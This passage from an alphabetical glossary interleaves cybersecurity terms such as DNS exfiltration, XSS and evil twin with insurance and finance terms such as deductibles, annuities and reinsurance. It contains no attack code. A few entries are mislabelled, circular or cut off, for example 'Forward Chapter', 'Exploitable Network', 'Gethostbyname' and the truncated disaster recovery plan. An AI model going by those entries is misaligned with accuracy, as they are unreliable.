A Data Owner is an executive of an organization entrusted with the administrative control of the data. An individual or executive has complete control over data, and he can control or limit the access of such data to people, assign permissions, etc., also he is accountable for such data accuracy and integrity.
Data protection
a set of methods aimed to safeguard private information from getting into the wrong hands.
Data Retention
Data Retention is the process of storing and protecting data for historical reasons and for data back up when needed. Every organization has its own rules governing data retention within the organization.
Data Theft
Data theft is the deliberate theft of information, rather than its accidental loss.
Data Transfer Device
A data transfer device is a fill device designed to securely store, transport, and transfer electronically both COMSEC and TRANSEC key. A DTD is designed to be backward compatible with the previous generation of COMSEC common fill devices, and programmable to support modern mission systems.
Database
A database is a systematic collection and organization of data by individuals or organizations so that it can be easily stored, retrieved, and edited for future use.
Date of Issue
date when an insurance company issues a policy.
Decentralization
Decentralization is the process of distributing functions and authorities among different people or to different locations.
Declarations
policy statements regarding the applicant and property covered such as demographic and occupational information, property specifications and expected mileage per year.
Decryption
A process of transforming encrypted data into its original plaintext data.
Decryption Key
A decryption key is a piece of code required to decipher or convert encrypted text or information into plain text or information.
Deductible
Portion of the insured loss (in dollars) paid by the policy holder.
Defense-in-depth
Defense-in-depth is the concept of stacking several layers of security, so backup protection is available if one fails.
Deferred Annuity
annuity payment to be made as a single payment or a series of installments to begin at some future date, such as in a specified number of years or at a specified age.
Demilitarized Zone
A demilitarized zone (DMZ) refers to a host or network that acts as a secure and intermediate network or path between an organization's internal network and the external.
Demutualization
conversion of a mutual insurance company to a capital stock company.
Denial of Service Attack
A denial-of-service (DoS) attack prevents users from accessing a computer or website.
Derivative
securities priced according to the value of other financial instruments such as commodity prices, interest rates, stock market prices, foreign or exchange rates.
Detection deficit
A detection deficit is a gap between the time an attack occurs and the time it is discovered. This term refers to the severity of attacks and how long they can cause harm undetected.
DLP
Data loss prevention (DLP) is a set of tools and processes used to ensure that sensitive data is not lost, misused, or accessed by unauthorized users.
DMZ
A demilitarized zone (DMZ) refers to a host or network that acts as a secure and intermediate network or path between an organization's internal network and the external.
Data Loss Prevention
Data loss prevention (DLP) is a set of tools and processes used to ensure that sensitive data is not lost, misused, or accessed by unauthorized users.
XSS
A type of injection security attack where an attacker will inject a malicious script into the content of website.
DDoS
Distributed Denial of Service (DDoS) is a type of denial of service (DOS) attack where multiple compromised systems are used to attack a single system causing an outage.
Device Control
Device control helps you control the use of removable storage, optical media drives and wireless networking protocols.
Digital Certificate
A Digital Certificate is an electronic "password" that allows a person or organization to exchange data securely over the Internet using the public key infrastructure (PKI).
Digital Evidence
Digital evidence is electronic information stored or transferred in digital form.
Digital Forensics
Digital Forensics is the process of procuring, analyzing, and interpreting electronic data to present it as acceptable evidence in a legal proceeding in a court of law.
Direct Incurred Loss
loss whereby the proximate cause is equivalent to the insured peril.
Direct Loss
Damage to covered real or personal property caused by a covered peril.
Direct Writer
an insurance company that sells policies to the insured through salaried representatives or exclusive agents only; reinsurance companies that deal directly with ceding companies instead of using brokers.
Direct Written Premium
total premiums received by an insurance company without any adjustments for the ceding of any portion of these premiums to the Reinsurer.
Directors and Officers Liability
liability coverage protecting directors or officers of a corporation from liability arising out of the performance of their professional duties on behalf of the corporation.
Disaster
A sudden event, catastrophe caused by the forces of nature or by a human error that results in serious damage to nature, society, human life, and property. Disaster in a business or commercial sense disables an enterprise from delivering the essential tasks for a specified period; for organizations disasters may result in loss of resources, assets, including data.
Disaster Recovery Plan
A Disaster Recovery Plan (DRP) or a Business Continuity Plan (BCP) prescribes steps required to carry on the business as usual in a disaster. Disaster recovery plan aims to bring business activities back to normalcy in the shortest possible time; such efforts require an in
Discretionary Access Control
Discretionary Access Control is a security measure, by which the owner can restrict the access of the resources such as files, devices, directories to specific subjects or users or user groups based on their identity. It is the discretion of the owner to grant permits or restrict users from accessing the resources completely or partially.
Disk Imaging
Disk imaging is the process of generating a bit-for-bit copy of the original media, including free space and slack space.
Disruption-
A disruption is an unplanned event that causes the general system or major application to be inoperable for an unacceptable length of time (e.g., minor, or extended power outage, extended unavailable network, or equipment or facility damage or destruction).
Distributed denial of service (DDoS) attack
DDoS, or distributed denial of service, occurs when a cybercriminal floods a server with traffic to prevent users from accessing a network, site, or system.
Dividend
a refund of a portion of the premium paid by the insured from insurer surplus.
DNS
The Domain Name System (DNS) is the phone book of the Internet. It allows computers to translate website names into IP address numbers so that they can communicate with each other.
DNS Exfiltration
Domain Name System (DNS) Exfiltration is a difficult to detect lower-level attack on DNS servers to gain unauthorized access. Such attacks lead to loss of data that range from simple to complex in nature and importance.
DNS Hijacking
DNS hijacking is a type of malicious attack in which an individual redirects queries to a domain name server (DNS).
Document Malware
Document malware takes advantage of vulnerabilities in applications that let you read or edit documents.
Domain Name Service
The Domain Name System (DNS) is the phone book of the Internet. It allows computers to translate website names into IP address numbers so that they can communicate with each other.
Domain Name System
A domain name system is a distributed system that internet servers follow to convert alphabetical domain names into numerical IP addresses. Internet servers follow a numerical IP addresses system, and to remember the numerical values of many domains is a difficult task, so domains use alphabetical address. Every time user types in an alphabetical domain name, the DNS helps internet by converting the alphabetical domain name into a numerical IP address.
Domain Name System Exfiltration
Domain Name System (DNS) Exfiltration is a difficult to detect lower-level attack on DNS servers to gain unauthorized access. Such attacks lead to loss of data that range from simple to complex in nature and importance.
Domestic Insurer
an insurance company that is domiciled and licensed in the state in which it sells insurance.
DRP
A Disaster Recovery Plan (DRP) or a Business Continuity Plan (BCP) prescribes steps required to carry on the business as usual in a disaster. Disaster recovery plan aims to bring business activities back to normalcy in the shortest possible time; such efforts require an in
Dual Interest
Insurance that protects the creditor's and the debtor's interest in the collateral securing the debtor's credit transaction. "Dual Interest" includes insurance commonly referred to as "Limited Dual Interest."
Dual Use Certificate
A dual-use certificate is intended for use with both digital signature and data encryption services.
Due Care
Due Care is the degree of care a rational person would exercise in similar situations to the one at hand. Alternatively known as ordinary care or reasonable care is a test of a person’s preparedness to act, be responsible or neglectful of responsibility
Due Diligence
Due Diligence is the process of conducting a thorough and detailed investigation, to verify the truthfulness of the information provided in the statements for analysis and review before committing to a transaction. It is a measure of prudence; a rational person would undertake before taking a final decision.
Duplicate Digital Evidence
Duplicate digital evidence is a duplicate that is an accurate digital reproduction of all data objects contained on the original physical item and associated media.
Dwelling Property/Personal Liability
a special form of package policy composed of dwelling fire and/or allied lines, and personal liability insurance.
Dynamic Ports
Dynamic Ports are otherwise known as private ports, these ports ranging from port number 49,152 to 65, 535 do not need any registration; these ports help any computer application communicate with any other application or program that uses transmission control protocol (TCP) or the User Datagram Protocol (UDP).
E
E-Commerce
The process of conducting any kind of business transaction or a commercial transaction electronically with the help of the internet is termed E-commerce. The Internet enables sellers to accept orders and payments online.
E-Government
E-Government is the U.S. government use of Web-based Internet applications and other information technology.
e-signature
An electronic signature, or e-signature, refers to data in electronic form, which is logically associated with other data in electronic form and used by the signatory to sign.
Early Warning System
a system designed by insurance industry regulators to identify practices and risk-related trends that contribute to systemic risk by measuring insurer’s financial stability.
Earned but Not Reported (EBNR)
premium amount insurer reasonably expects to receive for which contracts are not yet final and exact amounts are not definite.
Earned Premium
insured prepaid premium allocated to the insurance company's loss experience, expenses, and profit year- to -date.
Easter Egg
An Easter Egg is the hidden functionality within an application program, which becomes activated when an undocumented set of commands and keystrokes are entered. Easter eggs are typically used to display the credits for the development team and are intended to be nonthreatening.
Eavesdropping
Eavesdropping is the practice of listening, intercepting, or monitoring private communication between users or user groups without their knowledge or permission.
EDP Policies
coverage to protect against losses arising out of damage to or destruction of electronic data processing equipment and its software.
Effective Date
date at which an insurance policy goes into force.
Egress
Egress in general means to go out; in information technology, it is defined as the network traffic moving out of the network to the destination with the help of devices such as routers, etc.
Egress Filtering
Egress filtering is the filtering of outgoing network traffic.
Electronic Key Entry
Electronic Key Entry is the entry of cryptographic keys into a cryptographic module using electronic methods such as a smart card or a key-loading device.
Electronic Key Management System
An electronic key management system is an Interoperable collection of systems being developed by services and agencies of the U.S. government to automate the planning, ordering, generating, distributing, storing, filling, using, and destroying of electronic key and management of other types of COMSEC material.
Electronic Signature
An electronic signature, or e-signature, refers to data in electronic form, which is logically associated with other data in electronic form and used by the signatory to sign.
Electronically Generated Key
An electronically generated key is a key generated in a COMSEC device by mechanically or electronically introducing a seed key into the device and then using the seed in conjunction with a software algorithm stored in the device to produce the desired key.
Elliptical Curve Cryptography
Elliptical Curve Cryptography is a technique that uses elliptical curve equation to create cryptography keys; keys generated by this theory are much smaller, faster, and efficient, as well! This modern technique keeps the decryption key private, while the encryption key is public. Unlike traditional methods of generating cryptography keys such as RSA, elliptical curve technique uses discrete algorithms making it difficult to decipher the keys or challenge the keys.
Email Malware Distribution
Email malware refers to malware that is distributed via email.
Embedded Cryptography
Embedded cryptography is cryptography engineered into an equipment or system whose basic function is not cryptographic.
Employee Benefit Liability
liability protection for an employer for claims arising from provisions in an employee benefit insurance plan provided for the economic and social welfare of employees. Examples of items covered are pension plans, group life insurance, group health insurance, group disability income insurance, and accidental death and dismemberment.
Employers Liability
employers' liability coverage for the legal liability of employers arising out of injuries to employees. This code should be used when coverage is issued as an endorsement, or as part of a statutory workers' compensation policy.
Employment Practices Liability Coverage
liability insurance for employers providing coverage for wrongful termination, discrimination, or sexual harassment of the insured's current or former employees.
Encapsulation Security Payload
An Encapsulation Security Payload is an IPsec protocol offering mixed security in authentication, confidentiality, and integrity for Ipv4 and ipv6 Network packets. Encapsulation Security Payload offers data integrity and protection services by encrypting data, anti-replay, and preserving it in its assigned IP.
Encipher
To encipher is to convert plain text to cipher text via a cryptographic system.
Encode
To convert into a coded form.
Encryption
A method where plaintext (or any other type of readable data) is converted into an encoded version which can only be decoded by another entity if they have the decryption key. Encryption is an excellent way to secure data that’s transmitted across networks.
Encryption Algorithm
An encryption algorithm is a set of mathematically expressed rules for rendering data unintelligible by executing a series of conversions controlled by a key.
Encryption Certificate
An encryption certificate is one containing a public key used to encrypt electronic messages, files, documents, or data transmissions, or to establish or exchange a session key for these same purposes.
Encryption Key
An Encryption Key is a code of variable value developed with the help of encryption algorithm to encrypt and decrypt information.
End Cryptographic unit
An end cryptographic unit is a device that (1) performs cryptographic functions, (2) typically is part of a larger system for which the device provides security services, and (3) from the viewpoint of a supporting security infrastructure (e.g., a key management system), is the lowest level of identifiable component with which a management transaction can be conducted.
End-to-End Encryption
End-to-end encryption describes communications encryption in which data is encrypted when passing through a network with the routing information still visible.
Endorsement
an amendment or rider to a policy adjusting the coverages and taking precedence over the general contract.
Endpoint
In cybersecurity, an endpoint is a physical device connected to a computer network. Examples of endpoint devices include mobile devices, desktop computers, and embedded systems.
Endpoint detection and response (EDR) or endpoint threat detection and response (ETDR)
These cybersecurity acronyms are used to describe a solution that continuously monitors and mitigates potential threats in endpoint devices.
Endpoint Security
Endpoint security or Endpoint Protection is the process of securing the various endpoints on a network.
Enrollment
The total number of plans, not the total number of covered lives, provides coverage to the enrollee and their dependents.
Enterprise
An enterprise is an organization with a defined mission/goal and a defined boundary, using information systems to execute that mission, and with responsibility for managing its own risks and performance. An enterprise may consist of all or some of the following business aspects: acquisition, program management, financial management (e.g., budgets), human resources, security, and information systems, information, and mission management.
Enterprise Architecture
The enterprise architecture is the description of an enterprise’s entire set of information systems: configuration, integration and how they interface. Enterprise architecture also describes how they are operated to support the enterprise mission, and how they contribute to the enterprise’s overall security posture.
Entrapment
Entrapment is the deliberate planting of apparent flaws in an information system with the intent to detect attempted penetrations.
Equity Indexed Annuity
a fixed annuity that earns interest or provides benefits that are linked to an external reference or equity index, subject to a minimum guarantee.
Eradication
Eradication is an important function of the incident management process that follows the containment of an incident. Upon identifying and controlling the incident in the containment stage, eradication helps identify and remove the root cause of the incident completely from the system and avoid any chances of recurrences of the incident.
Errors and Omissions Liability/ Professional Liability Other than Medical
liability coverage of a professional or quasi professional insured to persons who have incurred bodily injury or property damage, or who have sustained any loss from omissions arising from the performance of services for others, errors in judgment, breaches of duty, or negligent or wrongful acts in business conduct.
Ethernet
Ethernet is the most popular Local Area Network (LAN) technology that specifies cabling and signaling system for home networks or for organizations. Ethernet uses BUS topology to support data transfers and Carrier sense multiple access/ collision detection (CSMA/CD) system to process requests at the same time.
Ethical Hacking (white hat)
Ethical hacking is sometimes referred to as white hat hacking. It describes authorized hacking that is meant to simulate malicious hacking. Ethical hacking helps organizations identify vulnerabilities in their cybersecurity systems, protocols, and processes.
Event
An Event is an action or an occurrence that a program can detect. Examples of some events are clicking of a mouse button or pressing the key, etc.
Evidence
Evidence is documents, records or any such objects or information that helps prove the facts in a case.
Evil twin
In cybersecurity terms, an evil twin refers to a fraudulent Wi-Fi access point (AP). An evil twin attack occurs when someone disguises a fraudulent Wi-Fi AP as legitimate by mimicking a legitimate Wi-Fi’s network name and settings. Connecting to this network allows the attacker to eavesdrop and steal sensitive data.
Excess and Umbrella Liability
liability coverage of an insured above a specific amount set forth in a basic policy issued by the primary insurer; or a self-insurer for losses over a stated amount; or an insured or self-insurer for known or unknown gaps in basic coverages or self-insured retentions.
Excess of Reinsurance
loss sharing mechanism where an insurer pays all claims up to a specified amount and a reinsurance company pays any claims in excess of stated amount.
Excess Workers’ Compensation
either specific and/or aggregate excess workers' compensation insurance written above an attachment point or self-insured retention.
Exercise Key
An exercise key is cryptographic key material used exclusively to safeguard communications transmitted over-the-air during military or organized civil training exercises.
Expense Ratio
percentage of premium income used to attain and service policies. It was derived by subtracting related expenses from losses incurred and dividing them by written premiums.
Experience Rating
rating system where each group is rated entirely based on its own expected claims in the coming period, with retrospective adjustments for prior periods. This method is prohibited under the conditions for federal qualification.
Exploit
An exploit is an attack on a computer system, especially one that takes advantage of a particular vulnerability the system offers to intruders.
Exploit Code
An exploit code is a program that allows attackers to automatically break into a system.
Exploitable Channel
An exploitable channel is a channel that allows the violation of the security policy governing an information system and is usable or detectable by subjects external to the trusted computing base.
Exploitable Network
An external network is a network not controlled by the organization.
Exposure
risk of possible loss
External Security Testing
External security testing is security testing conducted from outside the organization’s security perimeter.
Extra Expense Insurance
a type of property insurance for extraordinary expenses related to business interruption such as a back-up generator in case of power failure.
F
Face Amount
the value of a policy to be provided upon maturity date or death.
Facultative Reinsurance
reinsurance for a specific policy for which terms can be negotiated by the original insurer and reinsurer.
Failover
A failover is a process of switching to a redundant system in the event of a system-wide failure.
Fail Safe
A Fail Safe is the automatic protection of programs and/or processing systems when hardware or software failure is detected.
Fail Soft
Fail soft is the elective termination of affected nonessential processing when hardware or software failure is determined to be imminent.
Fair Value
the amount at which an asset (or liability) could be bought (or incurred) or sold (or settled) in a current transaction between willing parties, that is, other than in a forced or liquidation sale. Quoted market prices in active markets are the best evidence of fair value and shall be used as the basis for the measurement, if available. If a quoted market price is available, the fair value is the product of the number of trading units’ times market price.
Fake Antivirus Malware
Fake antivirus malware reports non-existent threats in order to scare the user into installing malicious software and/or paying for unnecessary product registration and cleanup.
False Positive
A false positive is an alert that incorrectly indicates that malicious activity is occurring.
Farm Owners Insurance
Farm owners’ insurance sold for personal, family or household purposes. This package policy is similar to a homeowner’s policy, in that it has been developed for farms and ranches and includes both property and liability coverage for personal and business losses. Coverage includes farm dwellings and their contents, barns, stables, other farm structures and farm inland marine, such as mobile equipment and livestock.
Federal Information System
The Federal Information System is an information system used or operated by an executive agency, a contractor of an executive agency, or by another organization on behalf of an executive agency.
Fees Payable
fees incurred but not yet paid.
Fidelity
a bond or policy covering an employer's loss resulting from an employee's dishonest act (e.g., loss of cash, securities, valuables, etc.).
File Encryption
File encryption is the process of encrypting individual files on a storage medium and permitting access to the encrypted data only after proper authentication is provided.
File Name Anomaly
File name anomaly is a mismatch between the internal file header and its external extension. A File name anomaly is also a file name inconsistent with the content of the file (e.g., renaming a graphics file with a non-graphical extension).
File Protection
File protection is the aggregate of processes and procedures designed to inhibit unauthorized access, contamination, elimination, modification, or destruction of a file or any of its contents.
File Security
File security is the method in which access to computer files is limited to authorized users only.
FDE
Full disk encryption is the process of encrypting all the data on the hard disk drive used to boot a computer, including the computer’s operating system, and permitting access to the data only after successful authentication with the full disk encryption product.
File Transfer Protocol
The File Transfer Protocol (FTP) is a legacy network protocol used for the transfer of files between two endpoints. This protocol is replaced by more secure methods like Secure File Transfer Protocol (SFTP) since it supports encryption.
Fill Device
A fill device is a COMSEC item used to transfer or store keys in electronic form or to insert keys into cryptographic equipment.
Financial Guaranty
a surety bond, insurance policy, or an indemnity contract (when issued by an insurer), or similar guaranty types under which loss is payable upon proof of occurrence of financial loss to an insured claimant, oblige or indemnitee as a result of failure to perform a financial obligation or any other permissible product that is defined as or determined to be financial guaranty insurance.
Financial Reporting
Insurance companies must maintain records and file annual and quarterly financial statements with regulators in accordance with statutory accounting principles (SAP). Statutory rules also govern how insurers should establish reserves for invested assets and claims and the conditions under which they can claim credit for reinsurance ceded.
Financial Responsibility Law
a statute requiring motorists to show capacity to pay for automobile-related losses.
Financial Statement
balance sheet and profit and loss statement of an insurance company. This statement is used by the NAIC, and by State Insurance Commissioners to regulate an insurance company according to reserve requirements, assets, and other liabilities.
Firewall
A firewall is a network security device that monitors incoming and outgoing network traffic and makes decisions whether to allow or block specific traffic based on a defined set of rules.
Firewall Control Proxy
A firewall control proxy is the component that controls a firewall’s handling of a call. The firewall control proxy can instruct the firewall to open specific ports that are needed by a call and direct the firewall to close these ports at call termination.
Firmware
Firmware consists of the programs and data components of a cryptographic module that are stored in hardware within the cryptographic boundary and cannot be dynamically written or modified during execution.
Flaw Hypothesis Methodology
Flaw Hypothesis Methodology is the system analysis and penetration technique in which the specification and documentation for an information system are analyzed to produce a list of hypothetical flaws. This list is prioritized based on the estimated probability that a flaw exists, the ease of exploiting it, and the extent of control or compromise it would provide. The prioritized list is used to perform penetration testing of a system.
Flooding
Flooding is an attack that attempts to cause a failure in a system by providing more input than the system can process properly.
Focused Testing
Focused Testing is a test methodology that assumes some knowledge of the internal structure and implementation detail of the assessment object. Focused testing is also known as gray box testing.
Foreign Insurer
an insurance company selling policies in a state other than the state in which they are incorporated or domiciled.
Foreign Investment
an investment in a foreign jurisdiction, or an investment in a person, real estate or asset domiciled in a foreign jurisdiction. An investment shall not be deemed to be foreign if the issuing person, qualified primary credits source or qualified guarantor is a domestic jurisdiction or a person domiciled in a domestic jurisdiction, unless: a) The issuing person is a shell business entity; and b) The investment is not assumed, accepted, guaranteed or insured or otherwise backed by a domestic jurisdiction or a person, that is not a shell business entity, domiciled in a domestic jurisdiction.
Foreign Jurisdiction
a jurisdiction outside of the United States, Canada or any province or political subdivision of the foregoing.
Forensic Copy
Forensic copy is an accurate bit-for-bit reproduction of the information contained on an electronic device or associated media, whose validity and integrity has been verified using an accepted algorithm.
Forensic Examination
Forensic Examination is the investigation to evaluate, analyze organize, preserve, and document evidence, including digital evidence that helps identify the cause of an incident.
Forensic Specialist
A forensic specialist is a professional who locates, identifies, collects, analyzes, and examines data while preserving the integrity and maintaining a strict chain of custody of information discovered.
Forensically Clean
Forensically clean describes digital media that is completely wiped of all data, including nonessential and residual data, scanned for malware, and verified before use.
Forensics
Forensics is the practice of gathering, retaining, and analyzing computer-related data for investigative purposes in a manner that maintains the integrity of the data.
Forward Chapter
A forward cipher is one of the two functions of the block cipher algorithm determined by the choice of a cryptographic key. The term “forward cipher operation” is used for TDEA, while the term “forward transformation” is used for DEA.
Freeware
Freeware is an application, program, or software available for use at no cost.
Fronting
an arrangement in which a primary insurer acts as the insurer of record by issuing a policy, but then passes the entire risk to a reinsurer in exchange for a commission. Often, the fronting insurer is licensed to do business in a state or country where the risk is located, but the reinsurer is not.
FTP
The File Transfer Protocol (FTP) is a legacy network protocol used for the transfer of files between two endpoints. This protocol is replaced by more secure methods like Secure File Transfer Protocol (SFTP) since it supports encryption.
Full Disk Encryption
Full disk encryption is the process of encrypting all the data on the hard disk drive used to boot a computer, including the computer’s operating system, and permitting access to the data only after successful authentication with the full disk encryption product.
fuzzing
Fuzz testing (fuzzing) is a quality assurance technique used to discover coding errors and security loopholes in software, operating systems, or networks.
G
Gateway
A gateway is an intersection where networks with different transmission protocols meet. Gateways serve as the entry and exit points for all data, converting information from one format to another. For example, A Wi-Fi router is a gateway between your computer and your internet service provider’s network.
Generally Accepted Accounting Principle (GAAP)
an aggregate of the accounting standards, principles, and best practices for the preparation of financial statements allowing for consistency in reporting.
Get Nearest Server
Get Nearest Server is a request packet sent by a client on an IPX network to locate the nearest active server of a particular type. An IPX network client issues a GNS request to solicit either a direct response from a connected server or a response from a router that tells it where on the inter-network the service can be located. GNS is part of the IPX SAP.
Gethostbyaddr
The gethostbyaddr is a DNS (Domain Name System) query that returns the Internet host name corresponding to an IP address.
Gethostbyname
The gethostbyname is a DNS (Domain Name System) query that returns the name of the host corresponding to an Internet host name
GNU
The name GNU stands for “GNU’s Not Unix” (GNU is pronounced as g’noo). The development of GNU started in January 1984 and is known as the GNU Project. GNU is a Unix-like Operating System (OS), that comprises of many programs such as applications, libraries, developer tools, games. The GNU is available with source code that allows a user to run, copy, modify, distribute, study, change, and improve the software.
Gnutella
Gnutella is an open file sharing or peer-to-peer (P2P) network first developed by Justin Frankel and Tom Pepper of Nullsoft in early 2000. It was the first decentralized file sharing network that acts as a server for sharing files while simultaneously acting as a client that searches for and downloads files from other users.
Goodwill
the difference between the cost of acquiring the entity and the reporting entity's share of the book value of the acquired entity.
Governance
Governance is a system for directing and controlling an organization. It includes set of rules, processes, practices established to evaluate the options, needs, conditions of the stakeholders such as Management, Suppliers, financiers, customers, etc. It also includes a framework for attaining the established goals of an organization, alongside achieving a balance between the goals of organization and interests of the stakeholders. It aims to protect the interests of the organization by protecting the assets of the organization, and the interests of the creditors, customers.
Governance, Risk Management and Compliance
Governance, Risk Management and Compliance is a comprehensive and integrated organization wide system for achieving the goals set in each area namely governance, Risk management, and Compliance, and meet the regulatory standards and requirements.
Graduated Security
Graduated security is a security system that provides several levels (e.g., low, moderate, high) of protection based on threats, risks, available technology, support services, time, human concerns, and economics.
Gramm-Leach Bliley Act (GLBA)
act, repealing Glass-Steagal Act of 1933, allows consolidation of commercial banks, investment institutions and insurance companies. Established a framework of responsibilities of federal and state regulators for these financial industries. It permits financial services companies to merge and engage in a variety of new business activities, including insurance, while attempting to address the regulatory issues raised by such combinations.
Gross Paid-In and Contributed Surplus
Amount of capital received over the par value of the stock issued.
Gross Premium
the net premium for insurance plus commissions, operating and miscellaneous commissions. For life insurance, this is the premium including dividends.
Group Annuities- Deferred Non-Variable and Variable
an annuity contract that provides an accumulation based on both (1) funds that accumulate based on a guaranteed crediting interest rates or additional interest rate applied to designated considerations, and (2) funds where the accumulation varies in accordance with the rate of return of the underlying investment portfolio selected by the policyholder. The contract provides for the initiation of payments at some designated future date.
Group Annuities- Immediate Non-Variable and Variable
an annuity contract that provides an accumulation based on both (1) funds that accumulate based on a guaranteed crediting interest rates or additional interest rate applied to designated considerations, and (2) funds where the accumulation varies in accordance with the rate of return of the underlying investment portfolio selected by the policyholder. The contract provides for the initiation of payments at some interval that may vary, however the annuity payouts must begin within 13 months.
Group Annuities- Unallocated
annuity contracts or portions thereof where the Insurer purchases an annuity for the retirees.
Group Annuity
a contract providing income for a specified period, or duration of life for a person or persons established to benefit a group of employees.
Group Authenticator
A group authenticator is used sometimes in addition to a sign-on authenticator, to allow access to specific data or functions that may be shared by all members of a particular group.
Group Code
a unique three-to-five-digit number assigned by the NAIC to identify those companies that are part of a larger group of insurance companies.
Group Credit-Life
contracts sold in connection with loan/credit transactions or other credit transactions, which do not exceed a stated duration and/or amount and provide insurance protection against death.
Group Health
health insurance issued to employers, associations, trusts, or other groups covering employees or members and/or their dependents, to whom a certificate of coverage may be provided.
Guaranty Fund
funding mechanism employed by states to provide funds to cover policyholder obligations of insolvent reporting entities.
Guard System
A guard system is a mechanism limiting the exchange of information between information systems or subsystems.
Guessing Entropy
A guessing entropy is a measure of the difficulty that an Attacker must guess the average password used in a system. In this document, entropy is stated in bits. When a password has n-bits of guessing entropy then an attacker has as much difficulty guessing the average password as in guessing an n-bit random quantity. The attacker is assumed to know the actual password frequency distribution.
Guideline
A Guideline is a general rule, or a piece of advice required to follow to accomplish the set goals of an organization.
H
Hacker
A Hacker is a term used for an expert computer programmer who tries to gain unauthorized access to a network or computer systems with intent.
White Hat Hacker
is a cybersecurity expert who tests a system by running mock cyberattacks to discover potential security vulnerabilities.
Black Hat Hacker
is a person who tries to break into a computer system by exploiting cybersecurity vulnerabilities.
Hacktivism
Hacktivism is the term used to describe hacking activity that’s typically for political and social purposes, attacking corporations, governments, organizations, and individuals.
HAG
High Assurance Guard is an enclave boundary protection device that controls access between a local area network that an enterprise system has a requirement to protect, and an external network that is outside the control of the enterprise system, with a high degree of assurance. A guard that has two basic functional capabilities: a Message Guard and a Directory Guard. The Message Guard provides filter service for message traffic traversing the Guard between adjacent security domains. The Directory Guard provides filter service for directory access and updates traversing the Guard between adjacent security domains.
Handshaking Procedures
Handshaking procedures are the dialogue between two information systems for synchronizing, identifying, and authenticating themselves to one another.
Hard Copy Key
A hard copy key is physical keying material, such as printed key lists, punched, or printed key tapes, or programmable, read-only memories.
Hard Market
a market characterized by high demand and low supply.
Hardening
The process of securing a system.
Hardware
Hardware is the physical component of an information system. See also Software and Firmware
Hardwired Key
A hardwired key is a permanently installed key.
Hash-Based Message Authentication Code
Hash-based Message Authentication Code is a message authentication code that uses a cryptographic key and a hash function.
Hash Function
A Hash Function is used to map data of arbitrary size to data of a known or fixed size. The values returned by a hash function are called hash values, hash codes, hash sums, or simply hashes.
Hash Functions
A cryptographic hash function is a kind of hash function where it is impossible to recreate the input data from its hash value alone. The input data is referred to as the ‘message,’ and the hash value is called the ‘message digest’ or the ‘digest.’ The result of this hash function can be used to validate if a larger file has been changed, without comparing the larger files. Examples of frequently used hash functions are MD5 and SHA1.
Hash Total
A Hash Total is a method of verifying the accuracy of data; it includes adding up the data in different fields including fields, which have no significance such as account numbers, etc. The sum thus arrived should be the same as the original, a mismatch in the totals indicates an error.
Hash Value
A hash value is the result of applying a cryptographic hash function to data (e.g., a message).
Hashing
Hashing is generating a value or values from a string of text using a mathematical function.
Hazard
circumstance which tends to increase the probability or severity of a loss.
Header
A Header refers to the additional data at the beginning of a chunk of data (or packet) being stored or transmitted. The data that follows the header is called the payload or body. Note that it is important that the header is of clear and unambiguous format to allow for parsing.
HIDS
A host-based intrusion detection system (HIDS) is an intrusion detection system that monitors and analyses information from the operating system audit records occurring on the host. These operations are then compared to a pre-defined security policy norm. This analysis of the audit trail forces significant overhead requirements on the system due to the increased amount of processing power which must be utilized by the intrusion detection system. Depending on the size of the audit trail and the system's processing ability, the review of audit data could result in the loss of a real-time analysis capability.
High Assurance Guard
High Assurance Guard is an enclave boundary protection device that controls access between a local area network that an enterprise system has a requirement to protect, and an external network that is outside the control of the enterprise system, with a high degree of assurance. A guard that has two basic functional capabilities: a Message Guard and a Directory Guard. The Message Guard provides filter service for message traffic traversing the Guard between adjacent security domains. The Directory Guard provides filter service for directory access and updates traversing the Guard between adjacent security domains.
High Availability
High availability is a failover feature to ensure availability during device or component interruptions.
High Impact
High impact is the loss of confidentiality, integrity, or availability that could be expected to have a severe or catastrophic adverse effect on organizational operations, organizational assets, individuals, other organizations, or the national security interests of the United States; (i.e., 1) causes a severe degradation in mission capability to an extent and duration that the organization is able to perform its primary functions, but the effectiveness of the functions is significantly reduced; 2) results in major damage to organizational assets; 3) results in major financial loss; or 4) results in severe or catastrophic harm to individuals involving loss of life or serious life threatening injuries).
High Impact System
A high impact system is an information system in which at least one security objective (i.e., confidentiality, integrity, or availability) is assigned a FIPS 199 potential impact value of high. An information system in which at least one security objective (i.e., confidentiality, integrity, or availability) is assigned a potential impact value of high.
Hijack Attack
A Hijack Attack is a form of active wiretapping in which the attacker seizes control of a previously established communication association.
Hijacking
Hijacking is a network security attack by which the intruder takes control of a connection, while a session is in progress. The intruder gains unauthorized access to the information.
HMAC
Hash-based Message Authentication Code is a message authentication code that uses a cryptographic key and a hash function.
Hoax
Hoaxes are reports of false and unfounded claims to trick or defraud users.
Hold-Harmless Agreement
A risk transfer mechanism whereby one party assumes the liability of another party by contract.
HoneyClient
HoneyClient is a web browser-based high interaction client honeypot designed by Kathy Wang in 2004 and subsequently developed at MITRE. It was the first open-source client honeypot and is a mix of Perl, C++, and Ruby. HoneyClient is state-based and detects attacks on Windows clients by monitoring files, process events, and registry entries.
Honeymonkey
A honeymonkey is an automated program that imitates a human user to detect and identify websites which exploit vulnerabilities on the Internet. It is also known as Honey Client.
Honeypot
A honeypot is a computer security mechanism set to detect, deflect, or counteract attempts at unauthorized use of information systems.
Hops
A hop occurs each time that a data packet is passed from one device (source) to the next device (destination). Data packets pass through bridges, routers, and gateways on the way.
Host
A network host is a computer or other device connected to a computer network. A network host is a network node that is assigned a network layer host address. A network host may offer information resources, services, and applications to users or other nodes on the network.
Host-Based Intrusion Detection System
A host-based intrusion detection system (HIDS) is an intrusion detection system that monitors and analyses information from the operating system audit records occurring on the host. These operations are then compared to a pre-defined security policy norm. This analysis of the audit trail forces significant overhead requirements on the system due to the increased amount of processing power which must be utilized by the intrusion detection system. Depending on the size of the audit trail and the system's processing ability, the review of audit data could result in the loss of a real-time analysis capability.
Hot Site
A hot site is a fully operational offsite data processing facility equipped with hardware and software, to be used in the event of an information system disruption. Backup site that includes phone systems with the phone lines already connected. Networks will also be in place, with any necessary routers and switches plugged in and turned on. Desks will have desktop PCs installed and waiting, and server areas will be replete with the necessary hardware to support business-critical functions. Within a few hours, a hot site can become a fully functioning element of an organization.
Hot Wash
A hot wash is a debrief conducted immediately after an exercise or test with the staff and participants.
HTML
Hypertext Markup Language (HTML) is a set of markup symbols or codes inserted in a file intended for display on a World Wide Web (WWW) browser page. These markups state the browser how to display a web page to the user.
HTTP
